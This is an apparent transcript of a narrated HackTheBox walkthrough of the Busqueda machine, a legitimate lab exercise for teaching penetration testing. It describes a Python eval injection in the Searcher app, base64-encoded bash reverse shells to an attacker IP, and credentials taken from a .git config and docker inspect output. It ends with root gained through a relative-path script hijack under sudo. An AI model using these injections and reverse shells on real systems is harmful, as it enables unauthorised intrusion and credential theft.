What's going on YouTube? This is Ipsec. I'm doing Busqueda from HackTheBox, which starts out with a vulnerability and an application called Searcher. It is open source. You could go to its GitHub page, look at the releases, and find the exploit there. That being said, I think the more fun way to go about this is to use FFUF or wfuzz, fuzz for special characters, and then play around with the two characters that produce an odd result, which is a single quote and backslash, and then discover you in a Python eval statement and get code execution. It is a bit more tough to do it that way, but I think it builds foundations for just doing other web pen testing. Once you get on the box, you discover the application has a corresponding .git folder, and it's linked to a private gitea repo. Since it is a private repo and they used HTTP to check out, not SSH, it does put some credentials in the git config, so it can log into the git server to pull it down. So with that, you get credentials to the SVC user that has a sudo rule that you can abuse a Python script to get root. So with that being said, let's just jump in. As always, we start with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it Busqueda, and then the IP address of 10.10.11.208. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Apache HTTPD, also running on Ubuntu, and it is redirecting us to searcher.htb. And now there is something interesting here. If we had added this host name to our host file, so we had DNS resolution, it would tell us two different server headers. Right now it just says Apache. I'm going to add this in real quick. So we'll do sudo vi etc host, put in my password there, and we can do 10.10.11.208, and then searcher.htb. So I'm going to do curl -v, so we show host headers, -s, so it doesn't show some like status stuff. And then I'm just going to do 10.10.11.208, and I'm going to direct standard in to dev null. So it only shows us the headers, right? We could use burpsuite for this, but this is where we see the server header being Apache. If I change this request to be the domain name, searcher.htb, we have it now workzug as Python. So what this tells us is there is Apache and it's running like a proxy pass module. So anything on this domain, it just refers over to a Python web server. So when I get on the box, I expect to find either a socket file and Python running the web server off that socket file, but most commonly it will be listening on like port 8000 because a lot of developers or sysadmin just have it listen on a TCP port. You should always use sockets because it is less IO on the server, but I digress. So let us move on and check. So I'm going to go to 10.10.11.208. It's going to direct us at searcher. And we can look at this. It says search anything with searcher. Simply just type something in. So if we change this to be Google, I'm just going to do that because most people are familiar with Google. I'm going to search for Ipsec. And if I click search, it's going to give me a Google search query where if I just pasted this in, we search now Ipsec. I bet if I click auto redirect, it'll do that search for me. So there we go. If we look at the bottom, we can see searcher 240. If we do some Googling around, we can find there is a vulnerability here, but I'm not going to go searching for that because while it is how I compromised the box initially, there is a lot of value in fuzzing. And I want to show the power of fuzzing to show how obvious this vulnerability is. So I'm going to send it over to burpsuite. We're going to turn the proxy on, click search, and then we can send it over to repeater just to make sure it's exactly how we want it. So now I'm going to copy this to a file. And I'm going to call this search.request. We will save it. And now we can use FFUF. So I'm going to do FFUF. If we do -h, there are two options I really like, the -request and request proto. So if we do -request, we can say search.request, and then it defaults to HTTPS, and we are only using HTTP. So we have to do the request-proto HTTP, and then the standard word list we use. Let's do opsec list. Is it fuzzing special characters? We need to put a fuzz. So I'm going to go v search.request, and we're going to fuzz after ipsec. So it's going to go through the special characters word list and put it after ipsec. So if we do this, we can see we got quite a bit of variety in size. I'm going to just paste a few in and we can see kind of what it looks like. If we just did ipsec like this, we URL encode it. We got 41 in content length, and that is what it said here. Percent was 66. If we do percent, I don't know exactly why FFUF is saying 70. But I digress. The interesting ones are probably going to be 0. And since this is Python or something, we could also have done like a SSTI check. So if I'm going to Google Cobalt SSTI, and I always just use this one thing when testing out SSTI, because it will generally give us an interesting failure. So if I paste this in, click send, we get nothing back. We could delete one character at a time to find out where the bad character was, but with SSTI, I would have expected it to start printing something. And soon as we got rid of the single quote, that's when something happened, right? But I'm going to do a match size for 0, so we can see everything that just matches at 0. And these are when the application returns nothing. We can see it is a single quote and a backslash. So I'm going to put a backslash in, we get nothing, and a single quote in, we get nothing. So my first thought is let's do a like SQL injection check. So if I do dash dash plus dash, this is the standard MySQL comment. MySQL also has multiple comments. A hashtag is one. So I'm going to do %23, %20 because the little hashtag thing is a special character. And I also want to make sure there's a space afterwards. We can also put a %20 here, and we still get nothing. So at this point, we got to try to think what else could this be? And in Python, if this was like a print statement, or most programming languages, I don't want to say Python. I'm kind of stuck down Python because it said work zug on the server header. But we have user input here. And whenever there's a single quote, it could have a parenthesis. So let's end that. And we get a query. So now it looks like we have definitely discovered it. It's probably not going to be MySQL injection if we just look at this. It's not like, I doubt it's storing this in a MySQL table, then displaying it out to us. It just, the logic doesn't make sense. So I'm guessing we're probably in a eval statement or something like that. So I'm going to do a plus, and then we'll put a string to test for like string concatenation to see if we can append it. And we get nothing. But keep in mind, plus is a special character. So let's URL encode this, because when it gets to Python, it may have translated that plus to just a space. And this is invalid Python, right? That's not going to concatenate. So if we URL encode it, we can see it has added ip afterwards. So now we have tested and we found code execution. We can do print as well, and it just prints out ip. So now at this point, we want to see if we can import like OS and run commands. And I've never actually seen this little hover from burpsuite. If I press F2, it focuses that. I don't know what that did. But let's just go and import OS. So if we do __ import OS, and then we should be able to run .system. And then let's just run ID to test if it works. We run, and we do get the actual command. So now let's do a reverse shell. So I'm going to do echo-n --c. Then we'll do, I'm going to put this in quotes like this, --i dev tcp 10.10.14.2 9001 0 and 1. That looks correct. Just make sure that printed fine. And then I can do base 64 to encode it. And I want to get rid of the special characters. And just eyeballing it, I'm guessing that is around this spot. So if I just put a space here, that did nothing. Maybe it is here. There we go. And then there's another space. And we got 2 equals at the end. So if I put 2 equals here, that should, or not 2 equals, 2 spaces. Now we have just a standard string. So we can test this out real quick. I'm going to do this, nc lvmp 9001, echo-n, base64-d, bash. And, it's 10.10.14.8, not 10.10.14.2. My bad. Let's just get this on a new line. Copy. And I realized I don't have to do the bash-c because I'm piping it over to bash, but I already have it there, just force of habit. And it looks like a reverse shell does work. But that's why I always test, because if you type on IP or something like that, you can waste quite a bit of time. So we can now run this. And let's see, nc lvmp 9001. Enter. And we did not get a shell. So where did we screw up? So we did import OS. Let's see. I wonder if we have to put all these as %20s? I highly doubt that. Let's see. %2b, this was plus, right? Yeah. So if we go back to our logic, we can do Python 3-c, run this, and for some reason, it terminated after that space. So let us do %20s here. That doesn't make sense to me, but it is possible. I'm just going to copy %20 so it's on a clipboard. And I probably could have highlighted it and did URL encode, but I'm avoiding pluses. I don't think I have to. It's just something I am worried about. And that did not work either. Let's see. If we wrap this all up in a string call, 32512. So system gave me back the PID, I believe, but we didn't get a shell. So if we forgot the -d. It's hung, but at least that is better. We're still not catching. Oh, we got the shell up here. I was listening twice, but there we go. So Python 3-c import pty, pty.spawn, bin bash, then STTY-A, rows 31, columns 121. So STTY-A, or rows 31, cols 121. And we need to control Z, STTY, is it -raw, FG, enter. That was not what I wanted to do. I messed up my STTY command. Let's exit, reset. Let's just close this out. Close the whole pane. There we go. nc lvmp 9001. I typed exit and reset here. That is weird. I don't think I do XY there either. There we go. Python 3-c import pty spawn bin bash STTY raw minus echo, and then we can hit FG, enter, enter. And now I want to do the STTY, rows 21, cols 131. Is that right? I've put that backwards. There we go. And now we have tab autocomplete, right? Yes. We can export term is equal to x term. And it's funny how my muscle memory worked. When I did that out of order, I forgot what my STTY command was. But let's just do an lsla. And we can see there's an app.py templates and a git directory. If we do a git log, that is a weird error that I don't know about. We are the SVC user. If we cat app.py, we can see exactly how this works. Let's see, anything interesting here? Not really. If we go up one directory, there is HTML. Look at it, nothing there. If we go in templates, this is just index.html. If we do sslntp, we can see we have two applications. 5000, this is going to be our web server. We know this one is us because we have this whole process here. Standard users don't have the ability to, I guess, see what process is listing on a port. They can only see it's open, but we can see this one because, well, we own it, or it is our user. If we did a ps-ef grep on 1636, we'll see that is the SVC user. So that means there's something listening on 3000-222 and 3306 that is not our user. We know 3306 is going to be MySQL, but we don't see any database. So I'm going to go cd etc. It was Apache, right? Apache. Let's do sites enabled because we want to see exactly what is using MySQL. So I'm going to cat 000 default, and let's see, there is default is just doing a proxy pass to port 5000. There is a gitea instance that is doing a proxy pass to 3000. So we know port 3000 now is gitea. So I'm going to do a sudo vi etc host. And let's add gitea to this. And if we go to Firefox, gitea searcher HTTP, let's do HTTP like this. We get to this page. We don't have credentials to gitea. So let's try a sudo-l. We need the password for SVC. And we don't have that. Let's see. Var dub. HTML was nothing, right? Let's see, what's an opt? We have opt, containerd, and scripts. If we go to scripts, there is a few things there. So if we cat check ports, permission denied. Can we read any of these? We can only execute them, which isn't what I want. If we go in.get, permission denied. Let's see if we go in apt, is there anything in get here? There is. I wish I knew this one. I guess we can add this to see if this helps us. Get log. Only one commit. Let's see, grep-r svc. Let's look at app.py again just to make sure there's no database. Because we got to figure out exactly what MySQL is used for. And we have Flask, render template, searcher, engine, import subprocess. So there's literally no database here. One thing it could be, though, is maybe there's a password in the .git because it's got gitea in it, right? So if it's doing a checkout over HTTP and not SSH, it will have its password in the .git config file. And we can see this here. So we have Cody and then this password. So we should be able to log into gitea now. If I do Cody, put in this password, we can log in, and he has access to the searcher site. And looking at it, there's only the one commit. There's also an administrator user, which I don't believe is Cody. We have administrator at gitea. So let's log out and try logging in as administrator. So we'll do sign in, administrator, put in this password, and invalid username or password. I'm going to try the password for the SVC user. And let's just make sure my clipboard was right. Control Shift, there we go. Always, when you paste in a password, double check your clipboard because Linux does have two clipboards, Shift Insert and Control Shift Insert. You can see paste different things. So that's bit me more than once. So I always, after I paste it in, it doesn't work. I just make sure I'm pasting what I think I am. And we can run Python 3 on system-checkup.py. We don't know exactly what the script is. So if we just execute it as our standard user, we get an error if we do sudo. SVC is not allowed to execute that as root. Sudo-l. SVC. So we have to give it an argument. So I did ASD, and we have three things. We can do Docker PS, and we can see it shows the running instances of Docker. And there's a MySQL one. This is where 3306 is, and we have gitea as well. We can inspect containers, so we can do a Docker inspect on a container. I'm going to do 960. Let's see, container name. Does it want the whole thing? Does it want 4 characters? 9608. Let's see. Oh, we need format. Let's look at what Docker inspect is. So I'm going to go to Google. And let's see. Docker inspect. And it wants format. And it's kind of like an SSTI thing. So double squiggly brackets and then something. Config sounds interesting. So I'm going to do config like this. And then 9608. Like that. Oh, I only had one bracket. And we have variables here. And this looks, let's see, I don't know exactly how this is formatted. Let's see. It looks like if we specify JSON before it, then it will put it in JSON format. So let's just do that so it's easier to read. Unclosed action. We have a space there, so let's put this in quotes so it treats it as one argument, not two. And there we go. We have JSON. So I'm going to copy this. Then we can echo -n and then do JQ dot. And we can see this quite easily. And if we look at the environment, we can see we have a gitea database password of whatever this is. So now we can log into MySQL. We could also test this for other users. So if we did cat etsy passwd, let's grep for everything that ends in sh. We don't have any other users. Maybe we could do log in as gitea and put this as the password just in case it's reused. And we see they did reuse that password. There is a scripts thing, and now it looks like we can see all the source code. So we can see what checkports does. We got full checkup. So it does a Docker inspect. Let's see, this is install Flask. But this is the script that we are running as root. And we have the three options: full checkup, Docker PS, and Docker inspect. So we want to find some type of code execution vulnerability in here. Let's see, full checkup. We got usage, so action. So if we look at these actions, we have Docker inspect. It's pulling sysargv2, running arglist, and what does run command look like? Run command subprocess arglist. Okay. So inspect looks fine. Docker PS, we can't really inject into that. Here, it is going to execute full checkup.sh, and it's not using the full path. So if we just ran this in a directory that we have write access to, it should execute full checkup. So I'm going to go to dev shm, and we're going to create the file full checkup.sh, and then this will just be a reverse shell. So bash-c, bash-i, dev tcp 10.10.14.8, and 0 and 1 like that. chmod plus x on full checkup. We can do sudo -l, and then we want to make sure we're listening on 9001, and we can run sudo this command, so sudo this python and full checkup, and something went wrong. It looks like that's annoying. It deleted my reverse shell. Bash-i, dev tcp 10.10.14.8, 0 and 1 like that. We forgot 9001. Save it, chmod plus x, execute this, and we have a shell as root on this box. So that's pretty much going to be this box. I did realize I forgot to show one thing, and that is exporting this the boring way of just looking at this GitHub project, looking at issues, and seeing what they actually patched. So if we go here, we can probably look at issues, look at closed, and see if they talk about any vulnerabilities. So let's see. If we do security, I don't see anything. Add info scraper, research Pinterest. This has a major one. This is bug. So if we look at this issue, coding space, this doesn't look like it. This doesn't look like it either. Let's go next. Add examples. Let's see. Sometimes it's hard to find the security things. Let's try actually going to the releases, or maybe security. Nope, nothing there. Let's see, where's releases? If we look at it, it's currently on 252. We're on 240. So let's just look at change logs around that. Nothing there. Here, they list out a vulnerability. Patched a priority vulnerability in Searcher CLI. And it's talking about removed eval. So let's see. How do we check this? Commits. If we look at it, we can see our suspicion was exactly correct. We are in a eval statement. And we actually, I think we're injecting into query. So this way we put the single quote, and then we got the end parenthesis. So we had to do single quote, end parenthesis, and we're in just a raw eval. So that's why our Python code worked. So yeah, hope you guys enjoyed the box. Take care, and I will see you all next time.